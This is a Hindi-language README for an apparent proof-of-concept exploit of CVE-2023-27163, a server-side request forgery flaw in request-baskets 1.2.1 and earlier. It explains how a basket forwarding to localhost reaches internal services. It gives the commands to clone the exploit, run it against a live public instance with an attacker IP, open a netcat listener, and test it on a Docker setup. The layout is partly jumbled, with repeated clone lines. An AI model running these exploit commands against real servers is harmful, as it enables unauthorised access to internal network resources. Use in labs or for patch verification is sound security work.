
request-baskets (V<= v.1.2.1) में सर्वर साइड रिक्वेस्ट फोर्जरी (SSRF) के लिए प्रूफ ऑफ कॉन्सेप्ट
इस रिपॉज़िटरी में CVE-2023-27163 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शामिल है, जो request-baskets में संस्करण 1.2.1 तक पाई गई सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) भेद्यता है। यह भेद्यता हमलावरों को एक क्राफ्टेड API अनुरोध के माध्यम से /api/baskets/{name} घटक का शोषण करके नेटवर्क संसाधनों और संवेदनशील जानकारी तक पहुँचने की अनुमति देती है।
git clone https://github.com/MasterCode112/CVE-2023-27163.git
bash ./CVE-2023-27163.sh https://rbaskets.in/ <attacker IP>
Request-baskets एक वेब एप्लिकेशन है जिसे किसी विशिष्ट रूट, जिसे basket कहा जाता है, पर अनुरोधों को एकत्र करने और पंजीकृत करने के लिए बनाया गया है। इसे बनाते समय, उपयोगकर्ता अनुरोध को आगे भेजने के लिए कोई अन्य सर्वर निर्दिष्ट कर सकता है। यहाँ समस्या यह है कि उपयोगकर्ता अनपेक्षित सेवाओं, जैसे नेटवर्क-क्लोज्ड एप्लिकेशन, को निर्दिष्ट कर सकता है।
उदाहरण के लिए: मान लीजिए कि सर्वर Request-baskets (पोर्ट 55555) और पोर्ट 8000 पर एक Flask वेब सर्वर होस्ट करता है। Flask भी केवल localhost के साथ इंटरैक्ट करने के लिए कॉन्फ़िगर किया गया है। एक ऐसा basket बनाकर जो http://localhost:8000 पर फॉरवर्ड करता है, हमलावर पहले से प्रतिबंधित Flask वेब सर्वर तक पहुँच सकता है।

docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
``` git clone https://github.com/MasterCode112/CVE-2023-27163.git
2. PoC डाउनलोड करें
```shell
git clone https://github.com/MasterCode112/CVE-2023-27163.git
nc -lvp 8000
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/